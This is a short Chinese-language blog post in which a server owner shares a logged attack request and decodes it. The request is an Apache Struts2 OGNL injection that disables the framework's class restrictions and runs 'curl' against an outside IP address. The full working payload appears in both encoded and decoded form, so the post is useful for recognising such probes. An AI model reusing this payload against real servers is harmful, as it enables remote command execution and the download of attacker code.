很久沒寫weblog的東西了, 大部分都是phpMyAdmin、WordPress或NAS的漏洞攻擊, 這幾天看到了一個有趣的東西, 它居然是可以正常access的:
45.146.164.15 - - [22/Dec/2020:14:20:40 +0800] "GET /?id=%25%7B%28%27Powered_by_Unicode_Potats0%2Cenjoy_it%27%29.%28%23UnicodeSec+%3D+%23application%5B%27org.apache.tomcat.InstanceManager%27%5D%29.%28%23potats0%3D%23UnicodeSec.newInstance%28%27org.apache.commons.collections.BeanMap%27%29%29.%28%23stackvalue%3D%23attr%5B%27struts.valueStack%27%5D%29.%28%23potats0.setBean%28%23stackvalue%29%29.%28%23context%3D%23potats0.get%28%27context%27%29%29.%28%23potats0.setBean%28%23context%29%29.%28%23sm%3D%23potats0.get%28%27memberAccess%27%29%29.%28%23emptySet%3D%23UnicodeSec.newInstance%28%27java.util.HashSet%27%29%29.%28%23potats0.setBean%28%23sm%29%29.%28%23potats0.put%28%27excludedClasses%27%2C%23emptySet%29%29.%28%23potats0.put%28%27excludedPackageNames%27%2C%23emptySet%29%29.%28%23exec%3D%23UnicodeSec.newInstance%28%27freemarker.template.utility.Execute%27%29%29.%28%23cmd%3D%7B%27curl+93.189.44.137%2Fssa%27%7D%29.%28%23res%3D%23exec.exec%28%23cmd%29%29%7D HTTP/1.1" 200 1833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
經解碼紅色字串後得到如下:
id=%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'curl 93.189.44.137/ssa'}).(#res=#exec.exec(#cmd))}
估狗後得知是一個 Apache Struts2 遠端命令執行漏洞, Apache Struts2 是一個開發 Java EE 網路應用程式的 Web 框架, 使用某些標籤時可能存在 OGNL(Object-Graph Navigation Language 物件圖導航語言) 注入漏洞, 而可遠端命令執行
比較注意的是這段: (#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'curl 93.189.44.137/ssa'}).(#res=#exec.exec(#cmd))}
連到 93.189.44.137/ssa 不曉得要執行什麼, 不過我的 web server 很單純, 幾乎沒有什麼東西
沒有留言:
張貼留言